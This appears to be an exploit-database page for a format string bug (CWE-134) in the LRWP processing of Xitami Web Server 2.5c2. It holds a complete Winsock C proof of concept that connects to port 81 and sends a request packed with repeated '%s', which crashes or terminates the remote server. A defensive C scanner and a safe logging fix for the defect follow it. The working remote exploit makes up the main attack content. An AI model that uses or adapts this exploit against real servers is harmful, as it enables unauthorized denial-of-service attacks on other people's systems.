Xitami Web Server v2.5c2 LRWP Processing Format String PoC

2009.03.26
Credit: bratax
Risk: High
Local: No
Remote: Yes
CWE: CWE-134


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/**
 * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
 * Advisory is available at: http://www.bratax.be/advisories/b013.html
 * (multiple vulnerabilities! check it out!)
 *
 * @author: bratax
 * @url: http://www.bratax.be/
 * @email: bratax@gmail.com
 *
 * Thanks to BuzzDee for teaching me how to use reverse code engineering to
 * find bugs & thanks to DiabloHorn as well ;-)
 * Greetz to NR!
 **/
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

#define PORT 81 // target port

int main(int argc, char *argv[]){
    int sockfd;
    struct hostent *he;
    struct sockaddr_in their_addr;
    WSADATA wsaData;
    char formatstring[250];

    if (argc != 2){
        printf("\nXitami Web Server 2.5c2\n");
        printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
        printf("[+] tested on WinXP Pro SP2 & Vista\n");
        printf("[+] usage: %s <hostname>\n\n", argv[0]);
        return -1;
    }

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
        fprintf(stderr, "WSAStartup failed.\n");
        return -1;
    }

    if ((he = gethostbyname(argv[1])) == NULL){ // get the host info
        perror("gethostbyname");
        return -1;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("socket");
        return -1;
    }

    their_addr.sin_family = AF_INET;                        // host byte order
    their_addr.sin_port = htons(PORT);                      // short, network byte order
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);                // zero the rest of the struct

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1){
        printf("[-] Connect failed.\n");
        closesocket(sockfd);
        return -1;
    }

    printf("[+] Server is listening...\n");
    Sleep(1000);

    /* setup format string request:
       %s*100 + \xFF + somestring + \xFF (program termination)
       or: %n + \xFF + somestring + \xFF (program crash) */
    memset(formatstring, '\x41', sizeof(formatstring));
    for (int i = 0; i < 200; i += 2){
        memcpy(formatstring + i, "%s", 2);
    }
    memcpy(formatstring + 200, "\xFF", 1);
    memcpy(formatstring + 249, "\xFF", 1);

    printf("[+] Sending format string request...");
    Sleep(2000);
    if (send(sockfd, formatstring, sizeof(formatstring), 0) == -1) {
        Sleep(2000);
        printf("failed! Exiting...\n");
        closesocket(sockfd);
        WSACleanup();
        return -1;
    }
    Sleep(2000);
    closesocket(sockfd);
    printf("done.\n");
    return 0;
}
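A defender's counterpart to the PoC above, added here as an example and not part of the original advisory or of Xitami: a scanner that flags inbound bytes laid out like this request (long runs of %s, any %n) for a front-end filter or IDS rule, beside the logging pattern that removes the CWE-134 defect. The directive threshold of 8, the function names and the constructed sample request are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Result of scanning one inbound request body for printf-style directives. */
struct fmt_scan {
    size_t directives;        /* '%' conversions other than the literal "%%" */
    size_t write_directives;  /* "%n" conversions: the memory-write primitive */
    size_t high_bytes;        /* bytes >= 0x80, such as the 0xFF delimiters in the PoC */
};

/* Count format directives in untrusted bytes (not NUL-terminated, may contain 0x00). */
struct fmt_scan scan_for_format_directives(const unsigned char *buf, size_t len)
{
    struct fmt_scan r = {0, 0, 0};
    size_t j;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] >= 0x80) r.high_bytes++;
        if (buf[i] != '%') continue;
        if (i + 1 < len && buf[i + 1] == '%') { i++; continue; }  /* "%%" is a literal */
        r.directives++;
        /* skip flags, width, precision and length modifiers to reach the conversion char */
        for (j = i + 1; j < len && buf[j] != '\0' && strchr("-+ #0123456789.*hlLqjzt", buf[j]); j++)
            ;
        if (j < len && buf[j] == 'n') r.write_directives++;
    }
    return r;
}

/* Filter policy: any "%n", or more directives than a legitimate request could
 * plausibly carry (threshold of 8 is an assumption), gets the request rejected. */
int reject_format_request(const unsigned char *buf, size_t len)
{
    struct fmt_scan r = scan_for_format_directives(buf, len);
    return r.write_directives > 0 || r.directives > 8;
}

/* Code-level fix for CWE-134: untrusted bytes are passed as a "%.*s" argument,
 * never as the format string itself, so "%s" and "%n" in them are inert. */
void log_request_safely(FILE *out, const unsigned char *buf, size_t len)
{
    fprintf(out, "lrwp request, %lu bytes: %.*s\n", (unsigned long)len, (int)len, (const char *)buf);
}

/* Constructed sample laid out like the PoC: 100 "%s", 0xFF at 200, 'A' padding, 0xFF at 249. */
struct fmt_scan scan_sample_poc_request(void)
{
    unsigned char req[250];
    memset(req, 'A', sizeof req);
    for (size_t i = 0; i < 200; i += 2) memcpy(req + i, "%s", 2);
    req[200] = 0xFF;
    req[249] = 0xFF;
    return scan_for_format_directives(req, sizeof req);
}
```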

References:

http://xforce.iss.net/xforce/xfdb/41644
http://www.securityfocus.com/bid/28603
http://www.milw0rm.com/exploits/5354
http://www.bratax.be/advisories/b013.html



Copyright 2021, cxsecurity.com
